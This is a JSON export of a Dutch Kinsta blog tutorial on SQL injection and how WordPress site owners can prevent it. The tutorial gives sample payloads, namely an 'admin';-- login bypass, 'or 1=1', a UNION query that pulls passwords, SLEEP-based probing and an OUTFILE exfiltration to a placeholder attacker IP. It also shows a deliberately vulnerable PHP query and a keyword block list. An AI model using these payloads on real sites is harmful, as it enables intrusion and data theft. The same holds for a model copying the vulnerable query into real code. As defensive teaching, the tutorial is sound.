{"id":29380,"date":"2020-01-23T07:29:01","date_gmt":"2020-01-23T15:29:01","guid":{"rendered":"https:\/\/kinsta.com\/?p=62827"},"modified":"2023-10-12T16:26:07","modified_gmt":"2023-10-12T14:26:07","slug":"sql-injecties","status":"publish","type":"post","link":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/","title":{"rendered":"SQL injectie: Een gedetailleerde handleiding voor WordPress gebruikers"},"content":{"rendered":"<p>Een SQL injectie is een code-injectietechniek die aanvallers gebruiken om kwetsbaarheden op het niveau van de database van een website of applicatie uit te buiten. Als aanvallers een SQL injectie kunnen uitvoeren, kunnen ze toegang krijgen tot de database.<\/p>\n<p>Als je begrijpt hoe deze aanvallen werken, kun je ze beter voorkomen. Zo kun je je website en klanten veilig houden.<\/p>\n<p>In dit artikel gaan we in op de verschillende soorten SQL injecties. We laten je ook zien hoe je je site tegen deze aanvallen kunt beschermen. Laten we er meteen in duiken!<\/p>\n<div><\/div><kinsta-auto-toc heading=\"Table of Contents\" exclude=\"last\" list-style=\"arrow\" selector=\"h2\" count-number=\"-1\"><\/kinsta-auto-toc>\n<h2>Wat is een SQL injectie?<\/h2>\n<p>SQL (Structured Query Language) is een taal waarmee we kunnen <a href=\"https:\/\/kinsta.com\/nl\/blog\/wordpress-database\/\">communiceren met databases<\/a>. Moderne webapplicaties gebruiken databases om gegevens te beheren en dynamische inhoud weer te geven aan lezers.<\/p>\n<p>Er is sprake van SQL injectie (of SQLi) wanneer een gebruiker kwaadaardige SQL statements probeert in te voegen in een webapplicatie. Als dat lukt, krijgen ze toegang tot gevoelige gegevens in de database.<\/p>\n<p>In 2023 behoren SQL injecties nog steeds tot de meest voorkomende aanvallen op het web. Alleen al in 2022 werden <a href=\"https:\/\/www.cvedetails.com\/vulnerability-list\/year-2022\/opsqli-1\/sql-injection.html\" target=\"_blank\" rel=\"noopener noreferrer\">1162 SQL injectiekwetsbaarheden<\/a> toegevoegd aan de CVE beveiligingsdatabase.<\/p>\n<p>Het goede nieuws is dat SQL injecties niet meer zo vaak voorkomen als vroeger. De meeste applicaties zijn ge\u00ebvolueerd om zich te beschermen tegen SQL aanvallen.<\/p>\n<p>In 2012 was <a href=\"https:\/\/www.techworld.com\/news\/security\/barclays-97-percent-of-data-breaches-still-due-sql-injection-3331283\/\" target=\"_blank\" rel=\"noopener noreferrer\">97 procent van alle datalekken<\/a> te wijten aan SQL injecties. Tegenwoordig is dat aantal nog steeds hoog, maar veel beter beheersbaar.<\/p>\n<h2>Hoe werken kwetsbaarheden rond SQL injecties?<\/h2>\n<p>Een SQL injectie kwetsbaarheid geeft een aanvaller volledige toegang tot de database van je applicatie door het gebruik van kwaadaardige SQL statements.<\/p>\n<p>Laten we eens kijken naar een voorbeeld van een kwetsbare applicatie.<\/p>\n<p>Stel je de workflow voor van een typische webapplicatie waarbij databaseverzoeken worden gedaan via gebruikersinvoer. Je neemt de gebruikersinvoer door middel van een formulier, bijvoorbeeld een inlogformulier. Je bevraagt volgens je database met de velden die de gebruiker heeft ingevuld om hem te verifi\u00ebren. De structuur van de query naar je database ziet er ongeveer zo uit:<\/p>\n<pre><code class=\"language-sql\">select * from user_table\nwhere username = 'sdaityari'\nand password = 'mypassword';<\/code><\/pre>\n<p>Laten we er voor het gemak van uitgaan dat je je wachtwoorden als platte tekst opslaat. Het is echter een goede gewoonte om <a href=\"https:\/\/kinsta.com\/nl\/blog\/wordpress-salt-codes\/\">je wachtwoorden te salten<\/a> en vervolgens te hashen. Als je de gebruikersnaam en het wachtwoord van het formulier hebt ontvangen, kun je de query als volgt in PHP defini\u00ebren:<\/p>\n<pre><code class=\"language-php\">\/\/ Connect to SQL database\n$db_query = \"select * from user_table where\nusername = '\".$user.\"'\nAND password = '\".$password.\"';\";\n\/\/ Execute query<\/code><\/pre>\n<p>Als iemand de waarde &#8216;admin&#8217;;&#8211;&#8216; invoert in het veld gebruikersnaam, zal de resulterende SQL query die de variabele $db_query genereert als volgt zijn:<\/p>\n<pre><code class=\"language-sql\">select * from user_table where\nusername = 'admin';--' and password = 'mypassword'<\/code><\/pre>\n<p>Wat doet deze query?<\/p>\n<p>In SQL begint het &#8212; symbool een comment, dus alles wat er na komt wordt genegeerd. Dit verwijdert de wachtwoordcontrole uit de query. Het resultaat is dat als &#8220;admin&#8221; een geldige gebruikersnaam is, de aanvaller kan inloggen zonder het wachtwoord te kennen. Tenminste, als er geen beveiliging is tegen dit soort aanvallen.<\/p>\n<p>Als alternatief kan in dit voorbeeld ook een booleaanse aanval worden gebruikt om toegang te krijgen. Als een aanvaller &#8220;password&#8217; of 1=1;-&#8221; invoert in het wachtwoordveld, zou de resulterende query er als volgt uitzien:<\/p>\n<pre><code class=\"language-sql\">select * from user_table where\nusername = 'admin' and\npassword = 'password' or 1=1;--';<\/code><\/pre>\n<p>In dit geval zou je, zelfs als je wachtwoord fout is, worden geverifieerd in de applicatie. Als je webpagina de resultaten van de database query weergeeft, kan een aanvaller het commando gebruiken om tabellen weer te geven, het commando om de tabellen in de database weer te geven en vervolgens selectief tabellen droppen als hij dat wil.<\/p>\n<figure>\n<figure style=\"width: 666px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/kinsta.com\/wp-content\/uploads\/2023\/09\/sql-injection-cartoon.png\" alt=\"Een cartoon over SQL injectie\" width=\"666\" height=\"205\"><figcaption class=\"wp-caption-text\">Een cartoon over SQL injectie (<strong>Bron:<\/strong> <a href=\"https:\/\/xkcd.com\/327\/\" target=\"_blank\" rel=\"noopener noreferrer\">XKCD<\/a>)<\/figcaption><\/figure>\n<p>Exploits of a Mom, een populair stripverhaal van XKCD, toont het gesprek van een moeder met de school van haar zoon, waarin haar wordt gevraagd of ze haar zoon echt &#8220;Robert&#8217;); DROP TABLE Students; -&#8221; heeft genoemd.<\/figure>\n<h2>Soorten SQL injectie<\/h2>\n<p>Nu je de basis van een SQL injectie kwetsbaarheid kent, laten we de verschillende soorten SQL injectie-aanvallen en de reden achter elk van hen verkennen.<\/p>\n<h3>In-Band SQL injectie<\/h3>\n<p>In-Band SQL injectie is de eenvoudigste vorm van SQL injectie. Hierbij kan de aanvaller hetzelfde kanaal gebruiken om de kwaadaardige SQL code in de applicatie in te voegen en de resultaten te verzamelen.<\/p>\n<p>Laten we eens kijken naar twee vormen van in-band SQL injectie-aanvallen.<\/p>\n<h4>Aanval op basis van fouten<\/h4>\n<p>Een op fouten gebaseerde aanval vindt plaats wanneer iemand opzettelijk de SQL query manipuleert om een databasefout te genereren. De foutmelding die de database teruggeeft bevat vaak informatie over de databasestructuur, die de aanvaller kan gebruiken om het systeem verder uit te buiten.<\/p>\n<p>Een aanvaller kan bijvoorbeeld &#8216; OR &#8216;1&#8217;=&#8217;1 invoeren in een formulierveld. Als de applicatie kwetsbaar is, kan deze een foutmelding teruggeven die informatie over de database onthult.<\/p>\n<h4>Aanval op basis van union<\/h4>\n<p>Op union gebaseerde SQL injectie-aanvallen gebruiken de SQL UNION operator om de resultaten van de oorspronkelijke query te combineren met resultaten van ge\u00efnjecteerde kwaadaardige query&#8217;s.<\/p>\n<p>Hierdoor kan de aanvaller informatie ophalen uit andere tabellen in de database:<\/p>\n<pre><code class=\"language-sql\">select title, link from post_table\nwhere id &lt; 10\nunion\nselect username, password\nfrom user_table; --;<\/code><\/pre>\n<p>In deze query combineert de UNION operator de resultaten van de oorspronkelijke query met de resultaten van <em>SELECT username<\/em>, <em>password<\/em> <em>FROM user_table<\/em>. Als de applicatie kwetsbaar is en de gebruikersinvoer niet goed zuivert, kan deze een pagina terugsturen die gebruikersnamen en wachtwoorden uit de gebruikerstabel bevat.<\/p>\n<h2>Inferenti\u00eble SQL injectie (blinde SQL injectie)<\/h2>\n<p>Zelfs als een aanvaller een fout genereert in de SQL query, is het mogelijk dat het antwoord van de query niet direct naar de webpagina wordt gestuurd. In dit geval moet de aanvaller verder onderzoek doen.<\/p>\n<p>Bij deze vorm van SQL injectie stuurt de aanvaller verschillende query&#8217;s naar de database om te beoordelen hoe de applicatie deze responses analyseert. Een inferenti\u00eble SQL injectie wordt ook wel blinde SQL injectie genoemd.<\/p>\n<p>We zullen hieronder twee soorten inferenti\u00eble SQL injecties bekijken: booleaanse SQL injectie en tijdsgebaseerde SQL injectie.<\/p>\n<h4>Booleaanse aanval<\/h4>\n<p>Als een SQL query resulteert in een fout die niet intern in de applicatie is afgehandeld, kan de resulterende webpagina een foutmelding geven, een lege pagina laden of gedeeltelijk laden. Bij een booleaanse SQL injectie beoordeelt een aanvaller welke delen van de invoer van een gebruiker kwetsbaar zijn voor SQL injecties door twee verschillende versies van een booleaanse clausule door de invoer te proberen:<\/p>\n<ul>\n<li>\u201c\u2026 and 1=1\u201d<\/li>\n<li>\u201c\u2026 and 1=2\u201d<\/li>\n<\/ul>\n<p>Deze query&#8217;s zijn ontworpen om een voorwaarde te hebben die waar of onwaar is. Als de voorwaarde waar is, wordt de pagina normaal geladen. Als de voorwaarde onwaar is, kan de pagina anders laden of een fout weergeven.<\/p>\n<p>Door te kijken hoe de pagina laadt, kan de aanvaller bepalen of de voorwaarde waar of onwaar was, ook al zien ze de daadwerkelijke SQL query of het antwoord van de database niet. Als je meerdere vergelijkbare condities samenstelt, kun je langzaam informatie uit de database halen.<\/p>\n<h4>Aanval op basis van tijd<\/h4>\n<p>Een op tijd gebaseerde SQL injectie-aanval kan een aanvaller helpen <a href=\"https:\/\/kinsta.com\/nl\/docs\/service-informatie\/beveiligingslekken-melden\/\">bepalen of er een kwetsbaarheid aanwezig is<\/a> in een webapplicatie. Een aanvaller maakt gebruik van een vooraf gedefinieerde op tijd gebaseerde functie van het databasebeheersysteem dat wordt gebruikt door de applicatie. <a href=\"https:\/\/kinsta.com\/nl\/blog\/wat-is-mysql\/\">In MySQL<\/a> bijvoorbeeld geeft de <a href=\"http:\/\/dev.mysql.com\/doc\/refman\/5.0\/en\/miscellaneous-functions.html#function_sleep\" target=\"_blank\" rel=\"noopener noreferrer\"><em>sleep()<\/em> functie<\/a> de database de opdracht om een bepaald aantal seconden te wachten.<\/p>\n<pre><code class=\"language-sql\">select * from comments\nWHERE post_id=1-SLEEP(15);<\/code><\/pre>\n<p>Als zo&#8217;n query resulteert in een vertraging, dan weet de aanvaller dat hij kwetsbaar is. Deze aanpak is vergelijkbaar met booleaanse aanvallen in die zin dat je geen daadwerkelijke respons krijgt van de database. Je kunt er echter wel informatie uit halen als de aanval slaagt.<\/p>\n<h2>Out-of-band SQL injectie<\/h2>\n<p>Bij een out-of-band SQL Injectie aanval manipuleert de aanvaller de SQL query om de database opdracht te geven gegevens te verzenden naar een server die door de aanvaller wordt bestuurd. Dit wordt meestal bereikt door gebruik te maken van databasefuncties die externe resources kunnen opvragen, zoals HTTP verzoeken of DNS verzoeken.<\/p>\n<p>Een out-of-band SQL injectie aanval maakt gebruik van een externe bestandsprocesmogelijkheid van je DBMS. In MySQL kunnen de LOAD_FILE() en INTO OUTFILE functies worden gebruikt om MySQL te verzoeken de gegevens naar een externe bron te sturen.<\/p>\n<p>Hier wordt uitgelegd hoe een aanvaller OUTFILE zou kunnen gebruiken om de resultaten van een query naar een externe bron te sturen:<\/p>\n<pre><code class=\"language-sql\">select * from post_table\ninto OUTFILE '\\\\MALICIOUS_IP_ADDRESSlocation'<\/code><\/pre>\n<p>Op dezelfde manier kan de LOAD_FILE() functie worden gebruikt om een bestand van de server te lezen en de inhoud weer te geven. Een combinatie van LOAD_FILE() en OUTFILE kan worden gebruikt om de inhoud van een bestand op de server te lezen en vervolgens naar een andere locatie te sturen.<\/p>\n<h2>Zo voorkom je SQL injecties<\/h2>\n<p>Tot nu toe hebben we de kwetsbaarheden in een webapplicatie onderzocht die kunnen leiden tot SQL injectie-aanvallen. Een kwetsbaarheid rond SQL injecties kan door een aanvaller worden gebruikt om de inhoud van je database te lezen, te wijzigen of zelfs te verwijderen.<\/p>\n<p>Daarnaast kan het ook leiden tot het lezen van een bestand op een willekeurige locatie binnen de server en de inhoud naar elders overbrengen. In dit gedeelte verkennen we verschillende technieken om je webapplicatie en website te beschermen tegen SQL injectie-aanvallen.<\/p>\n<h3>Gebruikersinvoer omzeilen<\/h3>\n<p>Over het algemeen is het moeilijk om te bepalen of een user string kwaadaardig is of niet. Daarom is het escapen van speciale tekens in gebruikersinvoer een veelgebruikte aanpak. Dit proces kan helpen beschermen tegen SQL injectie-aanvallen.<\/p>\n<p>In PHP kun je een string laten escapen voordat je de query opbouwt met de functie <code>mysqli_real_escape_string()<\/code>:<\/p>\n<pre><code class=\"language-sql\">$unsafe_variable = $_POST[\"user_input\"]; $safe_variable = mysqli_real_escape_string($conn, $unsafe_variable);<\/code><\/pre>\n<p>Bij het weergeven van gebruikersinvoer als HTML is het ook belangrijk om speciale tekens te converteren naar hun overeenkomstige HTML tekens om Cross-Site Scripting (XSS) aanvallen te voorkomen. Je kunt speciale tekens in PHP converteren met de functie <code>htmlspecialchars()<\/code>.<\/p>\n<h3>Gebruik prepared statements<\/h3>\n<p>Je kunt ook prepared statements gebruiken om SQL injecties te voorkomen. Een prepared statement is een template van een SQL query, waarbij je in een later stadium parameters opgeeft om de query uit te voeren.<\/p>\n<p>Hier is een voorbeeld van een prepared statement in PHP en MySQLi:<\/p>\n<pre><code class=\"language-php\">$query = $mysql_connection-&gt;prepare(\"select * from user_table where username = ? and password = ?\");\n$query-&gt;execute(array($username, $password));<\/code><\/pre>\n<h3>Andere hygiene checks om SQL aanvallen te voorkomen<\/h3>\n<p>De volgende stap in het beperken van deze kwetsbaarheid is het beperken van de toegang tot de database tot alleen het noodzakelijke.<\/p>\n<p>Je kunt bijvoorbeeld je webapplicatie verbinden met de DBMS door een specifieke gebruiker te gebruiken die alleen toegang heeft tot de relevante database.<\/p>\n<p>Daarnaast wil je de toegang van de databasegebruiker tot alle andere locaties van de server beperken. Het kan ook zijn dat je bepaalde SQL sleutelwoorden in je URL via je webserver wilt blokkeren.<\/p>\n<p>Als je <a href=\"https:\/\/kinsta.com\/nl\/blog\/nginx-vs-apache\/\">Apache<\/a> als webserver gebruikt, kun je de volgende regels code gebruiken in je <em><a href=\"https:\/\/kinsta.com\/nl\/blog\/wordpress-htaccess-bestand\/\">.htaccess<\/a><\/em><a href=\"https:\/\/kinsta.com\/nl\/blog\/wordpress-htaccess-bestand\/\"> bestand<\/a> om een <a href=\"https:\/\/kinsta.com\/nl\/blog\/403-forbidden-foutmelding\/#:~:text=The%20403%20Forbidden%20error%20means%20that%20your%20server%20is%20working,file%20permissions%20or%20.htaccess%20file.\"><em>403 Forbidden<\/em> foutmelding<\/a> te tonen aan een potenti\u00eble aanvaller.<\/p>\n<p>Je moet voorzichtig zijn voordat je deze techniek gebruikt, want Apache zal een fout weergeven aan een lezer als de URL deze trefwoorden bevat.<\/p>\n<pre><code>RewriteCond %{QUERY_STRING} [^a-z](declare\u00a6char\u00a6set\u00a6cast\u00a6convert\u00a6delete\u00a6drop\u00a6exec\u00a6insert\u00a6meta\u00a6script\u00a6select\u00a6truncate\u00a6update)[^a-z] [NC]\nRewriteRule (.*) - [F]<\/code><\/pre>\n<aside role=\"note\" class=\"wp-block-kinsta-notice is-style-info\">\n            <h3>Info<\/h3>\n        <p>Kinsta draait WordPress op de Nginx webserver, die geen .htaccess bestand ondersteunt. Als je een regel wilt instellen om trefwoorden op je URL te blokkeren, neem dan contact op met het supportteam van Kinsta en zij kunnen je helpen.<\/p>\n<\/aside>\n\n<p>Als extra preventietip moet je altijd <a href=\"https:\/\/kinsta.com\/nl\/blog\/wordpress-gehackt\/#2-keep-your-site-updated\">bijgewerkte software gebruiken<\/a>. Wanneer er een nieuwe versie of een patch wordt uitgebracht, worden de bugs die in de update zijn verholpen gedetailleerd beschreven in de release notes. Zodra de details van een bug openbaar zijn, kan het riskant zijn om een oude versie van software te gebruiken.<\/p>\n<h2>SQL injectie in WordPress<\/h2>\n<p>Je bent veilig voor elke SQL injectiekwetsbaarheid als je up-to-date WordPress core bestanden gebruikt. Maar als je plugins en thema&#8217;s van derden gebruikt, is je website altijd enigszins kwetsbaar. Je kunt dit risico grotendeels beperken door plugins en thema&#8217;s te gebruiken die regelmatig worden bijgewerkt en die veilige codeerpraktijken volgen.<\/p>\n<p>Je WordPress site is zo sterk als de zwakste schakel. In dit gedeelte gaan we in op de belangrijkste overwegingen om SQL injectie kwetsbaarheid in WordPress te beperken en hoe je kwetsbaarheden kunt controleren op je bestaande WordPress site.<\/p>\n<h3>Kwetsbaarheden rond SQL injecties voorkomen voor WordPress<\/h3>\n<p>Om de kwetsbaarheden rond SQL injecties in je <a href=\"https:\/\/kinsta.com\/nl\/blog\/snelste-wordpress-thema\/\">WordPress thema<\/a> of plugin te beperken, is de enige regel die je moet volgen om altijd bestaande WordPress functies te gebruiken bij interactie met de database.<\/p>\n<p>Deze functies zijn tijdens het WordPress ontwikkelproces grondig getest op SQL injectiekwetsbaarheden. Als je bijvoorbeeld een commentaar aan een bericht wilt toevoegen, gebruik dan de <em><a href=\"https:\/\/developer.wordpress.org\/reference\/functions\/wp_insert_comment\/\" target=\"_blank\" rel=\"noopener noreferrer\">wp_insert_comment() functie<\/a><\/em> in plaats van rechtstreeks gegevens in te voegen in de <em>wp_comments<\/em> tabel.<\/p>\n<p>Hoewel functies uitbreidbaar zijn, moet je soms een complexe query uitvoeren. Zorg er in zo&#8217;n geval voor dat je de <a href=\"https:\/\/developer.wordpress.org\/reference\/classes\/wpdb\/\" target=\"_blank\" rel=\"noopener noreferrer\"><em>$wp_db<\/em> groep van functies<\/a> gebruikt. Je kunt <em>$wpdb-&gt;prepare()<\/em> gebruiken om te escapen aan gebruikersinvoer voordat je de query maakt.<\/p>\n<p>Daarnaast is hier een lijst met functies om <a href=\"https:\/\/developer.wordpress.org\/themes\/theme-security\/data-sanitization-escaping\/\" target=\"_blank\" rel=\"noopener noreferrer\">gegevens in WordPress te zuiveren<\/a>. Deze kunnen je helpen om specifieke soorten gebruikersinvoer te omzeilen, zoals e-mails en URL&#8217;s.<\/p>\n<h2>Beveilig je WordPress site<\/h2>\n<p>Hoewel <a href=\"https:\/\/kinsta.com\/nl\/blog\/is-wordpress-veilig\/\">WordPress zelf veilig is<\/a>, kunnen zaken als verouderde core software en <a href=\"https:\/\/kinsta.com\/nl\/blog\/nulled-wordpress-plugins-themas\/\">nulled plugins<\/a> leiden tot kwetsbaarheden. Hoewel er geen alternatief is voor het grondig controleren van je WordPress site op SQL injectiekwetsbaarheden, kan de complexiteit van een website deze taak een uitdaging maken.<\/p>\n<p>Je kunt een online scantool gebruiken zoals <a href=\"https:\/\/wpscan.org\/\" target=\"_blank\" rel=\"noopener noreferrer\">WPScan<\/a>. We raden je ook aan om je plugins te controleren om te zien of hun ontwikkeling is gestagneerd. Als ze niet meer worden onderhouden, is het misschien geen goed idee om ze op je site te gebruiken.<\/p>\n<p>Als je ze toch moet gebruiken, zorg er dan voor dat je hun code en functionaliteit grondig test op kwetsbaarheden. Zorg er verder voor dat je deze hygiene checks volgt:<\/p>\n<ul>\n<li>Werk PHP, WordPress core en MySQL bij<\/li>\n<li>Werk plugins en thema&#8217;s van derden bij<\/li>\n<li>Vermijd het gebruik van de root-gebruiker om verbinding te maken met de SQL database<\/li>\n<li>Beperk de toegang van de SQL gebruiker tot gevoelige mappen<\/li>\n<li>Blokkeer SQL sleutelwoorden die je server gebruiken<\/li>\n<li>Bewaar backups van je site off-site in geval van onomkeerbare schade<\/li>\n<\/ul>\n<p>Hier is een gedetailleerde post over <a href=\"https:\/\/kinsta.com\/nl\/blog\/wordpress-beveiliging\/\">WordPress beveiliging<\/a> en een lijst met checks. Verder wil je misschien investeren in deze <a href=\"https:\/\/kinsta.com\/nl\/blog\/wordpress-beveiligingsplugins\/\">top beveiligingsplugins voor WordPress<\/a>. Dit is wat je moet doen als je <a href=\"https:\/\/kinsta.com\/nl\/blog\/wordpress-gehackt\/\">WordPress site gehackt<\/a> is ondanks je beste inspanningen.<\/p>\n<aside role=\"note\" class=\"wp-block-kinsta-notice is-style-info\">\n            <h3>Info<\/h3>\n        <p>Alle WordPress sites die worden gehost bij Kinsta staan achter Cloudflare, met zakelijke beveiligingsmaatregelen en -tools die zijn inbegrepen in elk pakket.<\/p>\n<\/aside>\n\n<h2>Is SQL injectie illegaal?<\/h2>\n<p>Absoluut! Ook al is er een kwetsbaarheid, een aanvaller probeert nog steeds toegang te krijgen tot gegevens die anders niet beschikbaar zouden zijn.<\/p>\n<p>Stel je een scenario voor waarbij iemand zijn sleutels in de auto laat liggen. Is het een overtreding om daarin weg te rijden, alleen omdat de auto open en onbeheerd werd achtergelaten?<\/p>\n<p>SQLi valt in verschillende landen onder verschillende wetten. Het valt onder de <a href=\"https:\/\/www.justice.gov\/sites\/default\/files\/criminal-ccips\/legacy\/2015\/01\/14\/ccmanual.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Computer Fraud and Abuse Act<\/a> (1986) in de VS en de <a href=\"http:\/\/www.legislation.gov.uk\/ukpga\/1990\/18\/contents\" target=\"_blank\" rel=\"noopener noreferrer\">Computer Misuse Act<\/a> (1990) in het Verenigd Koninkrijk.<\/p>\n<h2>Samenvatting<\/h2>\n<p>SQL injecties zijn al lange tijd een van de meest voorkomende aanvallen op allerlei soorten websites. Zelfs WordPress kan je niet beschermen tegen de mogelijkheid van SQL aanvallen als je geen maatregelen neemt om je website veilig te houden.<\/p>\n<p>Om deze aanvallen te voorkomen, moet je:<\/p>\n<ul>\n<li>Begrijpen hoe de SQL injectiekwetsbaarheden werken<\/li>\n<li>Verschillende manieren onderzoeken waarop aanvallers SQLi kunnen gebruiken om ongeautoriseerde toegang tot je webapplicatie te krijgen<\/li>\n<li>Methoden implementeren om je website te beschermen tegen SQLi aanvallen, zoals het escapen van gebruikersinvoer en het gebruik van prepared statements<\/li>\n<li>Een routine voor beveiligingscontrole volgen<\/li>\n<\/ul>\n<p>Bespaar tijd en kosten en maximaliseer de prestaties van je website met meer dan $275 aan integraties op ondernemingsniveau die in elk Managed WordPress pakket zijn inbegrepen. Denk hierbij aan een krachtig CDN, DDoS bescherming, malware- en hackbescherming, Edge Caching en Google&#8217;s snelste CPU machines. Ga nu aan de slag, zonder langetermijncontracten, en m\u00e9t ondersteunde migraties en een 30-dagen niet-goed-geld-terug-garantie.<\/p>\n<p><a href=\"https:\/\/kinsta.com\/nl\/wordpress-hosting\/\">Bekijk onze pakketten<\/a> of praat met sales om het pakket te vinden dat bij je past.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Een SQL injectie is een code-injectietechniek die aanvallers gebruiken om kwetsbaarheden op het niveau van de database van een website of applicatie uit te buiten. Als &#8230;<\/p>\n","protected":false},"author":118,"featured_media":29383,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_kinsta_gated_content":false,"_kinsta_gated_content_redirect":"","footnotes":""},"tags":[245,199],"topic":[892],"class_list":["post-29380","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-sitesecurity","tag-wordpresshack","topic-wordpress-ontwikkeling"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v24.6 (Yoast SEO v24.6) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>SQL injectie: Een gedetailleerde handleiding voor WordPress gebruikers<\/title>\n<meta name=\"description\" content=\"Leer wat een SQL injectie is, hoe je deze kwetsbaarheden rond SQL injecties kan voorkomen in je webapplicaties (zoals WordPress sites) en hoe je aanvallen kunt voorkomen.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/\" \/>\n<meta property=\"og:locale\" content=\"nl_NL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SQL injectie: Een gedetailleerde handleiding voor WordPress gebruikers\" \/>\n<meta property=\"og:description\" content=\"Leer wat een SQL injectie is, hoe je deze kwetsbaarheden rond SQL injecties kan voorkomen in je webapplicaties (zoals WordPress sites) en hoe je aanvallen kunt voorkomen.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/\" \/>\n<meta property=\"og:site_name\" content=\"Kinsta\u00ae\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Kinsta-Nederland-476213452787823\/\" \/>\n<meta property=\"article:published_time\" content=\"2020-01-23T15:29:01+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-12T14:26:07+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1460\" \/>\n\t<meta property=\"og:image:height\" content=\"730\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Shaumik Daityari\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:description\" content=\"Leer wat een SQL injectie is, hoe je deze kwetsbaarheden rond SQL injecties kan voorkomen in je webapplicaties (zoals WordPress sites) en hoe je aanvallen kunt voorkomen.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg\" \/>\n<meta name=\"twitter:creator\" content=\"@Kinsta_NL\" \/>\n<meta name=\"twitter:site\" content=\"@Kinsta_NL\" \/>\n<meta name=\"twitter:label1\" content=\"Geschreven door\" \/>\n\t<meta name=\"twitter:data1\" content=\"Shaumik Daityari\" \/>\n\t<meta name=\"twitter:label2\" content=\"Geschatte leestijd\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/\"},\"author\":{\"name\":\"Shaumik Daityari\",\"@id\":\"https:\/\/kinsta.com\/nl\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036\"},\"headline\":\"SQL injectie: Een gedetailleerde handleiding voor WordPress gebruikers\",\"datePublished\":\"2020-01-23T15:29:01+00:00\",\"dateModified\":\"2023-10-12T14:26:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/\"},\"wordCount\":2604,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kinsta.com\/nl\/#organization\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg\",\"keywords\":[\"sitesecurity\",\"wordpresshack\"],\"articleSection\":[\"WordPress beveiliging\"],\"inLanguage\":\"nl-NL\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/\",\"url\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/\",\"name\":\"SQL injectie: Een gedetailleerde handleiding voor WordPress gebruikers\",\"isPartOf\":{\"@id\":\"https:\/\/kinsta.com\/nl\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg\",\"datePublished\":\"2020-01-23T15:29:01+00:00\",\"dateModified\":\"2023-10-12T14:26:07+00:00\",\"description\":\"Leer wat een SQL injectie is, hoe je deze kwetsbaarheden rond SQL injecties kan voorkomen in je webapplicaties (zoals WordPress sites) en hoe je aanvallen kunt voorkomen.\",\"breadcrumb\":{\"@id\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#breadcrumb\"},\"inLanguage\":\"nl-NL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#primaryimage\",\"url\":\"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg\",\"contentUrl\":\"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg\",\"width\":1460,\"height\":730,\"caption\":\"SQL-injecties\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/kinsta.com\/nl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress ontwikkeling\",\"item\":\"https:\/\/kinsta.com\/nl\/onderwerpen\/wordpress-ontwikkeling\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"SQL injectie: Een gedetailleerde handleiding voor WordPress 